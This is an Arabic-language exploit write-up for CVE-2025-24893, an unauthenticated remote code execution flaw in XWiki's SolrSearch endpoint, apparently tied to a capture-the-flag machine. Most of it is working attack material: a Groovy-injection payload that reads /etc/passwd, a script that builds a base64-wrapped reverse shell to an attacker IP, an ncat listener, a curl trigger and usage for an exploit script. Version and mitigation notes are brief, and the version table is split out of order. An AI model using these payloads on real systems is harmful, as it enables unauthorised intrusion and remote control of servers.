
CVE-2025-24893 هي ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بعد (RCE) غير مصادق عليها في XWiki، وهي منصة ويكي مؤسسية مفتوحة المصدر وشائعة.
SolrSearch (واجهة XWiki)النقطة /xwiki/bin/get/Main/SolrSearch تدمج المدخلات غير الموثوقة text=
مباشرة في قالب Freemarker.
عند إغلاق القالب مبكراً وفتح كتلة {{groovy}} … {{/groovy}} جديدة،
يمكن للمهاجم تنفيذ تعليمات Groovy عشوائية دون الحاجة إلى مصادقة.
GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=<<<USER-DATA>>> HTTP/1.1
من المفترض أن يقوم SolrSearch بتضمين النص المُرسَل كمحتوى عادي، لكن معالج الماكرو
يفشل في إفلات }}}، لذا يحدث الآتي:
}}} يغلق كتلة Freemarker الحالية. {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
async=false يُجبر التنفيذ على أن يكون متزامناً (يعمل حتى للضيوف).نموذج PoC بسيط يطبع محتوى /etc/passwd:
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}
الإصدار المُشفّر URL (المسافات → %20، الأقواس → %7B/%7D، إلخ):
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
| الفرع | تم الإصلاح في | المُعرّض للخطر ≤ |
|---|---|---|
| 15.x | 15.10.11 | 15.10.10 (وجميع إصدارات 15.9 / 15.8 …) |
(المصدر: إرشاد OffSec وXWiki SEC-S 2025-02)

RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444
# 1. أمر واحد لشل عكسي
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"
# 2. Base64 (سطر واحد)
B64=$(echo -n "$SHELL" | base64 -w0)
# 3. لفها في ماكرو Groovy
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'
# 4. تشفير URL
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")
# بدء المتنصت
sudo ncat -lvnp 4444
# تشغيل الاستغلال
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"
xwiki_solr_rce.py موجود في exploit/ (انظر كتلة الكود أدناه).
python CVE-2025-24893.py -u <TARGET URL> -l <IP> -p <PORT>
حيث
<TARGET URL> - الرابط شامل http:// أو https://
(مرّر -c "id" لتنفيذ أمر عشوائي بدلاً من الشل)

# /etc/xwiki/xwiki.properties
solr.search.enabled = false
البحث وإثبات المفهوم: DeX1d
إخلاء مسؤولية: للاستخدام التعليمي فقط. تشغيل هذا ضد أنظمة لا تملكها غير قانوني.
| 14.x LTS | 14.10.17 | 14.10.16 |
| 13 / 12 | غير مدعومة – جميعها لا تزال مُعرّضة للخطر |